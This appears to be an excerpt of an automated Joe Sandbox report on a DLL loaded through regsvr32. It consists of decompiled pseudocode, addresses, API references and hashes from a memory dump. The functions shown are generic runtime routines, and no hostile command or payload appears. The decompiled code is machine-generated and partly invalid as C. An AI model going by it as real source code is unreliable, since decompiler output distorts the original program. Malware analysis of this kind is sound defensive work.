                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D21F0(__eflags, __rax, _a8, _a16);
                                                                                                        				E00007FFC7FFC123D21F0(__eflags, __rax, _a32, _a40);
                                                                                                        				E00007FFC7FFC123D2400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                        				_a24 = _t207;
                                                                                                        				E00007FFC7FFC123D2400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                        				_a48 = _t207;
                                                                                                        				_t209 = 0xffffffff - _a48;
                                                                                                        				_v120 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170(_t209, _a8);
                                                                                                        				_t211 =  *_t209 - _a24;
                                                                                                        				if (_v120 - 0xffffffff > 0) goto 0x123d3315;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170( *_t209 - _a24, _a8);
                                                                                                        				_v136 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170( *_t211 - _a24 - _a16, _a8);
                                                                                                        				_v128 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                        				if ( *0xffffffff - _v128 >= 0) goto 0x123d338e;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D22B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                        				_t218 = _a24;
                                                                                                        				if (_a48 != _t218) goto 0x123d33ec;
                                                                                                        				E00007FFC7FFC123D18D0(_t218, _a32);
                                                                                                        				_v112 = _t218 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t218 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t221 = _a32;
                                                                                                        				if (_a8 == _t221) goto 0x123d34a2;
                                                                                                        				E00007FFC7FFC123D18F0(_t221, _a8);
                                                                                                        				_t223 = _t221 + _a16 + _a24;
                                                                                                        				_v104 = _t223;
                                                                                                        				E00007FFC7FFC123D18F0(_t223, _a8);
                                                                                                        				_t225 = _t223 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t225, _v104, _v136);
                                                                                                        				E00007FFC7FFC123D18D0(_t225, _a32);
                                                                                                        				_v96 = _t225 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t225 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t228 = _a24;
                                                                                                        				if (_a48 - _t228 >= 0) goto 0x123d3558;
                                                                                                        				E00007FFC7FFC123D18F0(_t228, _a8);
                                                                                                        				_t229 = _t228 + _a40;
                                                                                                        				_v88 = _t229;
                                                                                                        				E00007FFC7FFC123D18F0(_t229, _a8);
                                                                                                        				_t230 = _t229 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t230, _v88, _a48);
                                                                                                        				E00007FFC7FFC123D18F0(_t230, _a8);
                                                                                                        				_v80 = _t230 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC123D18F0(_t230 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t235 = _a16;
                                                                                                        				if (_a40 - _t235 > 0) goto 0x123d360e;
                                                                                                        				E00007FFC7FFC123D18F0(_t235, _a8);
                                                                                                        				_t237 = _t235 + _a16 + _a24;
                                                                                                        				_v72 = _t237;
                                                                                                        				E00007FFC7FFC123D18F0(_t237, _a8);
                                                                                                        				_t239 = _t237 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t239, _v72, _v136);
                                                                                                        				E00007FFC7FFC123D18F0(_t239, _a8);
                                                                                                        				_v64 = _t239 + _a40;
                                                                                                        				E00007FFC7FFC123D18F0(_t239 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				_t243 = _a16 + _a24;
                                                                                                        				if (_t243 - _a40 > 0) goto 0x123d36eb;
                                                                                                        				E00007FFC7FFC123D18F0(_t243, _a8);
                                                                                                        				_t245 = _t243 + _a16 + _a24;
                                                                                                        				_v56 = _t245;
                                                                                                        				E00007FFC7FFC123D18F0(_t245, _a8);
                                                                                                        				_t247 = _t245 + _a16 + _a48;
                                                                                                        				E00007FFC7FFC123D1230(_t247, _v56, _v136);
                                                                                                        				E00007FFC7FFC123D18F0(_t247, _a8);
                                                                                                        				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                        				_v48 = _t248;
                                                                                                        				E00007FFC7FFC123D18F0(_t248, _a8);
                                                                                                        				_t249 = _t248 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t249, _v48, _a48);
                                                                                                        				goto 0x123d3810;
                                                                                                        				E00007FFC7FFC123D18F0(_t249, _a8);
                                                                                                        				_t250 = _t249 + _a40;
                                                                                                        				_v40 = _t250;
                                                                                                        				E00007FFC7FFC123D18F0(_t250, _a8);
                                                                                                        				_t251 = _t250 + _a16;
                                                                                                        				E00007FFC7FFC123D1230(_t251, _v40, _a24);
                                                                                                        				E00007FFC7FFC123D18F0(_t251, _a8);
                                                                                                        				_v32 = _t251 + _a16 + _a24;
                                                                                                        				E00007FFC7FFC123D18F0(_t251 + _a16 + _a24, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                        				_t257 = _a48 - _a24;
                                                                                                        				_v24 = _t257;
                                                                                                        				E00007FFC7FFC123D18F0(_t257, _a8);
                                                                                                        				_t259 = _t257 + _a40 + _a48;
                                                                                                        				_v16 = _t257 + _a40 + _a48;
                                                                                                        				E00007FFC7FFC123D18F0(_t257 + _a40 + _a48, _a8);
                                                                                                        				E00007FFC7FFC123D1230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                        				return E00007FFC7FFC123D23A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                        			}







































                                                                                                        0x7ffc123d3240
                                                                                                        0x7ffc123d3240
                                                                                                        0x7ffc123d3245
                                                                                                        0x7ffc123d324a
                                                                                                        0x7ffc123d324f
                                                                                                        0x7ffc123d326b
                                                                                                        0x7ffc123d3280
                                                                                                        0x7ffc123d329d
                                                                                                        0x7ffc123d32a2
                                                                                                        0x7ffc123d32c2
                                                                                                        0x7ffc123d32c7
                                                                                                        0x7ffc123d32d6
                                                                                                        0x7ffc123d32de
                                                                                                        0x7ffc123d32eb
                                                                                                        0x7ffc123d32fb
                                                                                                        0x7ffc123d3306
                                                                                                        0x7ffc123d3310
                                                                                                        0x7ffc123d331d
                                                                                                        0x7ffc123d3338
                                                                                                        0x7ffc123d3345
                                                                                                        0x7ffc123d335d
                                                                                                        0x7ffc123d336a
                                                                                                        0x7ffc123d3377
                                                                                                        0x7ffc123d3379
                                                                                                        0x7ffc123d3389
                                                                                                        0x7ffc123d338e
                                                                                                        0x7ffc123d339e
                                                                                                        0x7ffc123d33a8
                                                                                                        0x7ffc123d33b5
                                                                                                        0x7ffc123d33c2
                                                                                                        0x7ffc123d33e2
                                                                                                        0x7ffc123d33e7
                                                                                                        0x7ffc123d33ec
                                                                                                        0x7ffc123d33fc
                                                                                                        0x7ffc123d340a
                                                                                                        0x7ffc123d3417
                                                                                                        0x7ffc123d341f
                                                                                                        0x7ffc123d342c
                                                                                                        0x7ffc123d3439
                                                                                                        0x7ffc123d3451
                                                                                                        0x7ffc123d345e
                                                                                                        0x7ffc123d346b
                                                                                                        0x7ffc123d3478
                                                                                                        0x7ffc123d3498
                                                                                                        0x7ffc123d349d
                                                                                                        0x7ffc123d34a2
                                                                                                        0x7ffc123d34b2
                                                                                                        0x7ffc123d34c0
                                                                                                        0x7ffc123d34c5
                                                                                                        0x7ffc123d34cd
                                                                                                        0x7ffc123d34da
                                                                                                        0x7ffc123d34df
                                                                                                        0x7ffc123d34fa
                                                                                                        0x7ffc123d3507
                                                                                                        0x7ffc123d351c
                                                                                                        0x7ffc123d3529
                                                                                                        0x7ffc123d354e
                                                                                                        0x7ffc123d3553
                                                                                                        0x7ffc123d3558
                                                                                                        0x7ffc123d3568
                                                                                                        0x7ffc123d3576
                                                                                                        0x7ffc123d3583
                                                                                                        0x7ffc123d358b
                                                                                                        0x7ffc123d3598
                                                                                                        0x7ffc123d35a5
                                                                                                        0x7ffc123d35bd
                                                                                                        0x7ffc123d35ca
                                                                                                        0x7ffc123d35d7
                                                                                                        0x7ffc123d35e4
                                                                                                        0x7ffc123d3604
                                                                                                        0x7ffc123d3609
                                                                                                        0x7ffc123d3621
                                                                                                        0x7ffc123d362c
                                                                                                        0x7ffc123d363a
                                                                                                        0x7ffc123d3647
                                                                                                        0x7ffc123d364f
                                                                                                        0x7ffc123d365c
                                                                                                        0x7ffc123d3669
                                                                                                        0x7ffc123d3681
                                                                                                        0x7ffc123d368e
                                                                                                        0x7ffc123d36b1
                                                                                                        0x7ffc123d36b4
                                                                                                        0x7ffc123d36c1
                                                                                                        0x7ffc123d36c6
                                                                                                        0x7ffc123d36e1
                                                                                                        0x7ffc123d36e6
                                                                                                        0x7ffc123d36f3
                                                                                                        0x7ffc123d36f8
                                                                                                        0x7ffc123d3700
                                                                                                        0x7ffc123d3710
                                                                                                        0x7ffc123d3715
                                                                                                        0x7ffc123d3733
                                                                                                        0x7ffc123d3740
                                                                                                        0x7ffc123d3755
                                                                                                        0x7ffc123d3765
                                                                                                        0x7ffc123d378d
                                                                                                        0x7ffc123d37a5
                                                                                                        0x7ffc123d37a8
                                                                                                        0x7ffc123d37b8
                                                                                                        0x7ffc123d37c5
                                                                                                        0x7ffc123d37cd
                                                                                                        0x7ffc123d37dd
                                                                                                        0x7ffc123d380b
                                                                                                        0x7ffc123d3831

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1550686663-0
                                                                                                        • Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction ID: ce1341791fc0d2980b75a5f3528714b486b8cee2a0ebc348cbf215014fb34928
                                                                                                        • Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
                                                                                                        • Instruction Fuzzy Hash: 04D1C76AA1DFC981DA70DB91F4913EAB365FBC8794F804026DA8D43B6ADF6CD054CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageRegisterTouch
                                                                                                        • String ID: Cannot register application window for multi-touch input$Error
                                                                                                        • API String ID: 490141109-480840240
                                                                                                        • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction ID: 4514a1bf0832fda67742a39cc4e4a9a829c92a93074b6778cdc3d0a6b8d20cf4
                                                                                                        • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                        • Instruction Fuzzy Hash: 7351FB79908F6A82F7609B15E8943EA73A0FBC87A4F500535D68E47764DFBCE068C760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00007FFC7FFC123D2FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				long long _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _t100;
                                                                                                        				intOrPtr* _t102;
                                                                                                        				intOrPtr* _t104;
                                                                                                        				long long _t108;
                                                                                                        				long long _t110;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				intOrPtr _t116;
                                                                                                        				long long _t118;
                                                                                                        
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x123d303c;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				_t100 = _a32 - __rax;
                                                                                                        				_v64 = _a40;
                                                                                                        				_v72 = _t100;
                                                                                                        				E00007FFC7FFC123D3240(__edx, E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                        				goto 0x123d3214;
                                                                                                        				E00007FFC7FFC123D21F0(E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                        				E00007FFC7FFC123D2400(E00007FFC7FFC123D2250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                        				_a24 = _t100;
                                                                                                        				_t102 = 0xffffffff - _a40;
                                                                                                        				_v40 = 0xffffffff;
                                                                                                        				E00007FFC7FFC123D2170(_t102, _a8);
                                                                                                        				_t104 =  *_t102 - _a24;
                                                                                                        				if (_v40 - 0xffffffff > 0) goto 0x123d30aa;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t104, _a8);
                                                                                                        				_v56 =  *_t104 - _a24 - _a16;
                                                                                                        				_t108 = _a24;
                                                                                                        				if (_a40 - _t108 >= 0) goto 0x123d3126;
                                                                                                        				E00007FFC7FFC123D18F0(_t108, _a8);
                                                                                                        				_t110 = _t108 + _a16 + _a24;
                                                                                                        				_v32 = _t110;
                                                                                                        				E00007FFC7FFC123D18F0(_t110, _a8);
                                                                                                        				_t112 = _t110 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC123D1230(_t112, _v32, _v56);
                                                                                                        				E00007FFC7FFC123D2170(_t112, _a8);
                                                                                                        				_v48 =  *_t112 + _a40 - _a24;
                                                                                                        				if (_a40 > 0) goto 0x123d3162;
                                                                                                        				if (_a24 <= 0) goto 0x123d320f;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x123d320f;
                                                                                                        				_t116 = _a40;
                                                                                                        				if (_a24 - _t116 >= 0) goto 0x123d31d9;
                                                                                                        				E00007FFC7FFC123D18F0(_t116, _a8);
                                                                                                        				_t118 = _t116 + _a16 + _a24;
                                                                                                        				_v24 = _t118;
                                                                                                        				E00007FFC7FFC123D18F0(_t118, _a8);
                                                                                                        				_t120 = _t118 + _a16 + _a40;
                                                                                                        				E00007FFC7FFC123D1230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                        				E00007FFC7FFC123D18F0(_t118 + _a16 + _a40, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t120 + _a16, _a32, _a40);
                                                                                                        				return E00007FFC7FFC123D23A0(_t120 + _a16, _a8, _v48);
                                                                                                        			}


















                                                                                                        0x7ffc123d2fc0
                                                                                                        0x7ffc123d2fc5
                                                                                                        0x7ffc123d2fca
                                                                                                        0x7ffc123d2fcf
                                                                                                        0x7ffc123d2fef
                                                                                                        0x7ffc123d2ff6
                                                                                                        0x7ffc123d3006
                                                                                                        0x7ffc123d3011
                                                                                                        0x7ffc123d3016
                                                                                                        0x7ffc123d3032
                                                                                                        0x7ffc123d3037
                                                                                                        0x7ffc123d3046
                                                                                                        0x7ffc123d305d
                                                                                                        0x7ffc123d3062
                                                                                                        0x7ffc123d3071
                                                                                                        0x7ffc123d3079
                                                                                                        0x7ffc123d3083
                                                                                                        0x7ffc123d3093
                                                                                                        0x7ffc123d309e
                                                                                                        0x7ffc123d30a5
                                                                                                        0x7ffc123d30af
                                                                                                        0x7ffc123d30c7
                                                                                                        0x7ffc123d30cc
                                                                                                        0x7ffc123d30dc
                                                                                                        0x7ffc123d30e3
                                                                                                        0x7ffc123d30ed
                                                                                                        0x7ffc123d30f5
                                                                                                        0x7ffc123d30ff
                                                                                                        0x7ffc123d3109
                                                                                                        0x7ffc123d3121
                                                                                                        0x7ffc123d312b
                                                                                                        0x7ffc123d3143
                                                                                                        0x7ffc123d3151
                                                                                                        0x7ffc123d315c
                                                                                                        0x7ffc123d3162
                                                                                                        0x7ffc123d3179
                                                                                                        0x7ffc123d317f
                                                                                                        0x7ffc123d318f
                                                                                                        0x7ffc123d3196
                                                                                                        0x7ffc123d31a0
                                                                                                        0x7ffc123d31a8
                                                                                                        0x7ffc123d31b2
                                                                                                        0x7ffc123d31bc
                                                                                                        0x7ffc123d31d4
                                                                                                        0x7ffc123d31de
                                                                                                        0x7ffc123d31fb
                                                                                                        0x7ffc123d3218

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D2FF6
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                          • Part of subcall function 00007FFC123D3240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D3310
                                                                                                          • Part of subcall function 00007FFC123D3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D33A8
                                                                                                          • Part of subcall function 00007FFC123D3240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D33C2
                                                                                                          • Part of subcall function 00007FFC123D3240: char_traits.LIBCPMTD ref: 00007FFC123D33E2
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D30A5
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D30E3
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D30FF
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D3121
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D3196
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D31B2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D31D4
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D31DE
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D31FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284633421-0
                                                                                                        • Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction ID: 187339ec9b172baed9e037a8861745b3680e2ac70eb7c2858e5141c447c5a4bc
                                                                                                        • Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction Fuzzy Hash: D251E22AA1CED982DA50DB65E4413AAA3A4F7C4790F905136EBCD43B6ADF6CD411CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00007FFC7FFC123D893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				void* _v64;
                                                                                                        				intOrPtr _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				intOrPtr _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				intOrPtr _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				intOrPtr _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				long long _v160;
                                                                                                        				long long _v168;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t155;
                                                                                                        				void* _t185;
                                                                                                        				signed short _t199;
                                                                                                        				signed short _t200;
                                                                                                        				signed int _t201;
                                                                                                        				signed int _t250;
                                                                                                        				signed int _t252;
                                                                                                        				signed int _t254;
                                                                                                        				signed int _t255;
                                                                                                        				signed int _t258;
                                                                                                        				signed int _t261;
                                                                                                        				signed short* _t380;
                                                                                                        				signed short* _t381;
                                                                                                        				signed short* _t382;
                                                                                                        				signed short* _t384;
                                                                                                        				signed short** _t385;
                                                                                                        				long long _t386;
                                                                                                        				long long* _t389;
                                                                                                        				signed short* _t390;
                                                                                                        				long long* _t394;
                                                                                                        				long long* _t395;
                                                                                                        				long long* _t396;
                                                                                                        				signed short** _t397;
                                                                                                        				void* _t398;
                                                                                                        				void* _t399;
                                                                                                        				signed short* _t404;
                                                                                                        				signed short* _t405;
                                                                                                        				long long _t406;
                                                                                                        				signed short* _t407;
                                                                                                        				long long _t408;
                                                                                                        				intOrPtr _t409;
                                                                                                        
                                                                                                        				_t403 = __r8;
                                                                                                        				_t394 = __rdx;
                                                                                                        				_t386 = __rbx;
                                                                                                        				_a24 = __rbx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                        				r13d = 0;
                                                                                                        				_t255 = r9b & 0xffffffff;
                                                                                                        				r14d = r8d;
                                                                                                        				_v64 = _t406;
                                                                                                        				_t397 = __rdx;
                                                                                                        				if (_t406 != 0) goto 0x123d8987;
                                                                                                        				E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				goto 0x123d89b9;
                                                                                                        				if (r14d == 0) goto 0x123d89d1;
                                                                                                        				_t4 = _t403 - 2; // -2
                                                                                                        				if (_t4 - 0x22 <= 0) goto 0x123d89d1;
                                                                                                        				_v160 = __rcx;
                                                                                                        				r9d = 0;
                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                        				_v168 = _t408;
                                                                                                        				E00007FFC7FFC123D9674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                        				_t389 = _t397[1];
                                                                                                        				if (_t389 == 0) goto 0x123d901d;
                                                                                                        				 *_t389 =  *_t397;
                                                                                                        				goto 0x123d901d;
                                                                                                        				 *_t394 = _t406 + 2;
                                                                                                        				_t260 = r13d;
                                                                                                        				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x123d89fb;
                                                                                                        				0x123d9140();
                                                                                                        				goto 0x123d89fb;
                                                                                                        				_t378 =  *_t397;
                                                                                                        				 *_t397 =  &(( *_t397)[1]);
                                                                                                        				if (E00007FFC7FFC123DB244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x123d89ee;
                                                                                                        				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                        				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x123d8a32;
                                                                                                        				_t380 =  *_t397;
                                                                                                        				_t199 =  *_t380 & 0x0000ffff;
                                                                                                        				_t381 =  &(_t380[1]);
                                                                                                        				 *_t397 = _t381;
                                                                                                        				_a16 = 0xa70;
                                                                                                        				_v152 = 0xae6;
                                                                                                        				_v148 = 0xaf0;
                                                                                                        				_v144 = 0xb66;
                                                                                                        				r8d = 0x660;
                                                                                                        				_v140 = 0xb70;
                                                                                                        				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                        				r9d = _t20;
                                                                                                        				_v136 = 0xc66;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				_v132 = 0xc70;
                                                                                                        				r11d = 0x966;
                                                                                                        				_v128 = 0xce6;
                                                                                                        				_v124 = 0xcf0;
                                                                                                        				_v120 = 0xd66;
                                                                                                        				_v116 = 0xd70;
                                                                                                        				_v112 = 0xe50;
                                                                                                        				_v108 = 0xe5a;
                                                                                                        				_v104 = 0xed0;
                                                                                                        				_v100 = 0xeda;
                                                                                                        				_v96 = 0xf20;
                                                                                                        				_v92 = 0xf2a;
                                                                                                        				_v88 = 0x1040;
                                                                                                        				_v84 = 0x104a;
                                                                                                        				_v80 = 0x17e0;
                                                                                                        				_v76 = 0x17ea;
                                                                                                        				_v72 = 0x1810;
                                                                                                        				_v68 = 0xff1a;
                                                                                                        				if ((r14d & 0xffffffef) != 0) goto 0x123d8da0;
                                                                                                        				if (_t199 - 0x30 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x3a >= 0) goto 0x123d8b3e;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - 0xff10 >= 0) goto 0x123d8cdb;
                                                                                                        				if (_t199 - r8w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x66a >= 0) goto 0x123d8b66;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r10w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x6fa >= 0) goto 0x123d8b85;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r11w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x970 >= 0) goto 0x123d8ba4;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r9w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x9f0 >= 0) goto 0x123d8bc3;
                                                                                                        				goto 0x123d8cea;
